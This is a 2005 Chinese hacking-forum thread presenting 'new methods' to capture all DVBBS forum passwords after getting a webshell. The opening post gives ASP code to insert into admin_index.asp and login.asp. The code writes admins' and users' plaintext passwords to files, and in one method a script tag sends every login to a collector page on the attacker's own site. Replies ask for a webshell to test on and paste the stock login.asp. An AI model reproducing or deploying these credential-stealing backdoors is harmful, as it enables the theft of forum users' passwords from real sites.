20CN网络安全小组论坛 - 菜鸟乐园 - 获得DVBBS的所有密码新方法

论坛: 菜鸟乐园标题: 获得DVBBS的所有密码新方法

作者: lyplyp [lyplyp]

论坛用户

我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:
老办法:
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台，在目录下就生成了rain.txt，里面就记录了明文密码

这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。

新办法：

方法一:login.asp中Case "chk"下:
　　　on error resume next
　　　dim rain
　　　set lP=server.CreateObject("Adodb.Stream")
　　　rain.Open
　　　rain.Type=2
　　　rain.CharSet="gb2312"
　　　rain.LoadFromFile server.mapPath("918.asp")
　　　rain.Position=lp.Size
　　　rain.writetext now&request("username")&"text:"&request("password")&chr(10)
　　　rain.SaveToFile server.mapPath("918.asp"),2
　　　rain.Close
　　　set rain=nothing
这样918.asp将获得全部登陆人的密码，时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。
方法二:如果你有自己的网站:
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:
<%@codepage=936%>
<%Response.Expires=0 if request("k")="k" then%>
<pre>
<%elseif request("n")<>"" and request("p")<>"" then
　　　on error resume next
　　　dim rain
　　　set rain=server.CreateObject("Adodb.Stream")
　　　rain.Open
　　　rain.Type=2
　　　rain.CharSet="gb2312"
　　　rain.LoadFromFile server.mapPath("918.asp")
　　　zh=rain.readtext(6152192)&"<"&"%if isempty(request(""k"")) then response.redirect ""rain.asp""%"&">"
　　　rain.Position=0
　　　rain.writetext now&"有大侠以名　"&;request("n")&"　及密码　"&request("p")&"　试图登陆;其IP:"&Request.ServerVariables("REMOTE_ADDR")&"["&Request.ServerVariables("HTTP_X_FORWARDED_FOR")&"]"&chr(13)&chr(10)&zh
　　　rain.SaveToFile server.mapPath("918.asp"),2
　　　rain.Close
　　　set rain=nothing
end if%>

在login.asp那里插入一句:
response.write "<SCRIPT src=http://你网站/918x/rain.asp?n="&request("username")&"&"&p="&request("password")&"></SCRIPT>"
--------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里

这下调用Adodb.Stream，几乎机子里有是有的，所以成功率要更高。
玉蝴蝶上好就顶~~~~~~~~~~

地主发表时间: 05-01-29 19:28

回复: ctwgh [ctwgh]

论坛用户

感谢你为我们所做的一切,我永远支持你!!

B1层发表时间: 05-01-29 19:59

回复: lhh2003 [lhh2003]

论坛用户

没有地方试啊，楼主你提供一个webshell吧，让我们20cn的朋友一起试试好吗？嘻嘻

B2层发表时间: 05-01-29 20:14

回复: TenderWon [tender]

论坛用户

经我测试，dv7 sp2无效,测试dv6中。...

B3层发表时间: 05-01-30 05:33

回复: TenderWon [tender]

论坛用户

6.0的不一样~~~~~~~
login.asp




<%
'=========================================================
' File: login.asp
' Version:5.0
' Date: 2002-9-10
' Script Written by satan
'=========================================================
' Copyright (C) 2001,2002 AspSky.Net. All rights reserved.
' Web: http://www.aspsky.net,http://www.dvbbs.net
' Email: info@aspsky.net,eway@aspsky.net
'=========================================================

stats="填写登陆信息"
dim url,comeurl

call nav()
call head_var(2,0,"","")
if request("action")="chk" then
call chklogin()
if founderr then call dvbbs_error()
else
url=Request.ServerVariables("HTTP_REFERER")
%>
<form action="login.asp?action=chk" method=post>
<table cellpadding=3 cellspacing=1 align=center class=tableborder1>
<tr>
<th valign=middle colspan=2 align=center height=25>请输入您的用户名、密码登陆</td></tr>
<tr>
<td valign=middle class=tablebody1>请输入您的用户名</td>
<td valign=middle class=tablebody1><INPUT name=username type=text> <a href=reg.asp>没有注册？</a></td></tr>
<tr>
<td valign=middle class=tablebody1>请输入您的密码</font></td>
<td valign=middle class=tablebody1><INPUT name=password type=password> <a href=lostpass.asp>忘记密码？</a></td></tr>
<tr>
<td class=tablebody1 valign=top width=30% ><b>Cookie 选项</b><BR> 请选择你的 Cookie 保存时间，下次访问可以方便输入。</td>
<td valign=middle class=tablebody1> <input type=radio name=CookieDate value=0 checked>不保存，关闭浏览器就失效<br>
<input type=radio name=CookieDate value=1>保存一天<br>
<input type=radio name=CookieDate value=2>保存一月<br>
<input type=radio name=CookieDate value=3>保存一年<br> </td></tr>
<tr>
<td valign=top width=30% class=tablebody1><b>隐身登陆</b><BR> 您可以选择隐身登陆，论坛会员将在用户列表看不到您的信息。</td>
<td valign=middle class=tablebody1> <input type=radio name=userhidden value=2 checked>正常登陆<br>
<input type=radio name=userhidden value=1>隐身登陆<br>
</td></tr>
<input type=hidden name=comeurl value=<%=url%>>
<tr>
<td class=tablebody2 valign=middle colspan=2 align=center><input type=submit name=submit value="登陆"></td></tr></table>
</form>
<%
end if
call footer()

sub chklogin()
dim UserIP
dim username
dim userclass
dim password
dim article
dim cookies_path_s,cookies_path_d,cookies_path,usercookies
UserIP=replace(Request.ServerVariables("REMOTE_ADDR"),"'","")
if request("username")="" then
errmsg=errmsg+"<br>"+"<li>请输入您的用户名。"
founderr=true
else
username=trim(checkStr(request("username")))
end if
if request("password")="" then
errmsg=errmsg+"<br>"+"<li>请输入您的密码。"
founderr=true
else
password=md5(trim(checkStr(request("password"))))
end if
'判断更新cookies目录
cookies_path_s=split(Request.ServerVariables("PATH_INFO"),"/")
cookies_path_d=ubound(cookies_path_s)
cookies_path="/"
for i=1 to cookies_path_d-1
if not (cookies_path_s(i)="upload" or cookies_path_s(i)="admin") then cookies_path=cookies_path&cookies_path_s(i)&"/"
next
if cookiepath<>cookies_path then
cookiepath=replace(cookies_path,"'","")
conn.execute("update config set cookiepath='"&cookiepath&"'")
end if
if founderr then exit sub

usercookies=request("CookieDate")
if chkuserlogin(username,password,usercookies,1)=false then
errmsg=errmsg+"<br>"+"<li>您的用户名并不存在，或者您的密码错误，或者您的帐号已被管理员锁定。"
founderr=true
exit sub
end if
dim comeurlname
if instr(lcase(request("comeurl")),"reg.asp")>0 or instr(lcase(request("comeurl")),"login.asp")>0 or trim(request("comeurl"))="" then
comeurlname=""
comeurl="index.asp"
else
comeurl=request("comeurl")
comeurlname="<li><a href="&request("comeurl")&">"&request("comeurl")&"</a></li>"
end if
%>
<meta HTTP-EQUIV=REFRESH CONTENT='2; URL=<%=comeurl%>'>
<table cellpadding=3 cellspacing=1 align=center class=tableborder1 >
<tr>
<th height=25>登陆成功：<%=Forum_info(0)%>欢迎您的到来</th>
</tr>
<tr><td class=tablebody1><br>
<ul><%=comeurlname%><li><a href=index.asp>返回首页</a></li></ul>
</td></tr>
</table>
<%
end sub
%>

B4层发表时间: 05-01-30 05:42

论坛: 菜鸟乐园